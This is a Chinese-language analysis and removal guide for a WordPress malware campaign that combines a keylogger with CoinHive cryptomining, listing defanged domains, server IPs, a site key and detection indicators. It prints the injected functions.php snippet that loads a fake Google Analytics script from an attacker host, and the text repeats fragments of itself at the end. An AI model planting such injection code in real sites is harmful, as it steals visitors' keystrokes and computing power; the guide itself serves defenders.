WordPress键盘记录器与加密货币挖矿恶意软件分析及防护指南<\/h1>

恶意软件概述<\/h2>
本教学文档详细分析了一种针对WordPress网站的多功能恶意软件，该恶意软件结合了键盘记录和加密货币挖矿功能，通过多个域名进行传播。<\/p>

恶意域名演变<\/h2>

初始域名：cloudflare.solutions<\/code>（已失效）<\/li>

后续注册域名：

cdjs.online<\/code><\/li>
cdns.ws<\/code><\/li>
sdns.online<\/code><\/li>
msdns.online<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
恶意脚本注入方式<\/h2>
注入位置<\/h3>

WordPress数据库的wp_posts<\/code>表<\/li>
主题的functions.php<\/code>文件<\/li>
<\/ol>
常见注入代码示例<\/h3>
function<\/span> chmnr_klgr_enqueue_script<\/span>() {
<\/span><\/span>    wp_enqueue_script<\/span>('chmnr_klgr-js'<\/span>, 'hxxps:\/\/cdns[.]ws\/lib\/googleanalytics.js'<\/span>, false<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>恶意脚本分析<\/h2>
1. 假Google Analytics脚本<\/h3>
路径示例：<\/p>

hxxps:\/\/cdjs[.]online\/lib.js<\/code><\/li>
hxxps:\/\/cdns[.]ws\/lib\/googleanalytics.js?ver=...<\/code><\/li>
<\/ul>
功能：<\/p>

加载其他三个恶意脚本：

jquery-3.2.1.min.js<\/code>（加密货币挖矿脚本）<\/li>
kl.js<\/code>（键盘记录器）<\/li>
mnrstrtr.js<\/code>（挖矿启动器）<\/li>
<\/ol>
<\/li>
<\/ul>
2. 键盘记录器(kl.js)<\/h3>
特征：<\/p>

通过WebSocket协议(wss:\/\/cdjs[.]online:8085\/<\/code>)发送用户输入数据<\/li>
与之前cloudflare.solutions<\/code>版本的键盘记录器功能相似<\/li>
<\/ul>
3. 加密货币挖矿脚本<\/h3>
伪装为jQuery文件：<\/p>

hxxps:\/\/cdns[.]ws\/lib\/jquery-3.2.1.min.js?v=1.013<\/code><\/li>
<\/ul>
特点：<\/p>

使用CoinHive库进行门罗币挖矿<\/li>
提供备用配置：当CoinHive服务器连接失败时，使用cdjs.online<\/code>配置<\/li>
站点密钥：lZnIoM7JAc6g0xBbWpUsVKSuLPBehT4s<\/code><\/li>
<\/ul>
服务器基础设施<\/h2>
使用的IP地址：<\/p>

185.209.23.219<\/code> (对应cdjs.online<\/code>)<\/li>
185.14.28.10<\/code> (挖矿脚本和旧版键盘记录器)<\/li>
107.181.161.159<\/code> (对应cdns.ws<\/code>和msdns.online<\/code>)<\/li>
<\/ol>
感染清除指南<\/h2>
1. 删除恶意代码<\/h3>

检查并清理主题的functions.php<\/code>文件<\/li>
扫描wp_posts<\/code>表中的注入代码<\/li>
<\/ul>
2. 安全措施<\/h3>

更改所有WordPress密码<\/li>
更新所有服务器软件<\/li>
更新所有第三方主题和插件<\/li>
<\/ul>
3. 额外防护<\/h3>

部署Web应用防火墙(WAF)<\/li>
实施定期安全扫描<\/li>
<\/ul>
预防措施<\/h2>

保持WordPress核心、主题和插件更新<\/li>
使用强密码并定期更换<\/li>
限制使用来源不明的主题和插件<\/li>
实施文件完整性监控<\/li>
定期备份网站数据<\/li>
<\/ol>
技术检测指标<\/h2>
可关注的恶意特征：<\/p>

对上述域名的外联请求<\/li>
functions.php<\/code>文件中的可疑函数<\/li>
异常的WebSocket连接(端口8085)<\/li>
异常的CPU使用率(可能表明挖矿活动)<\/li>
<\/ul>
通过以上详细分析和防护指南，网站管理员可以有效识别、清除并预防此类恶意软件的感染。<\/p>

WordPress键盘记录器与加密货币挖矿恶意软件分析及防护指南<\/h1>

恶意软件概述<\/h2> 本教学文档详细分析了一种针对WordPress网站的多功能恶意软件，该恶意软件结合了键盘记录和加密货币挖矿功能，通过多个域名进行传播。<\/p>

恶意脚本注入方式<\/h2>

恶意脚本分析<\/h2>

感染清除指南<\/h2>

恶意软件概述<\/h2>
本教学文档详细分析了一种针对WordPress网站的多功能恶意软件，该恶意软件结合了键盘记录和加密货币挖矿功能，通过多个域名进行传播。<\/p>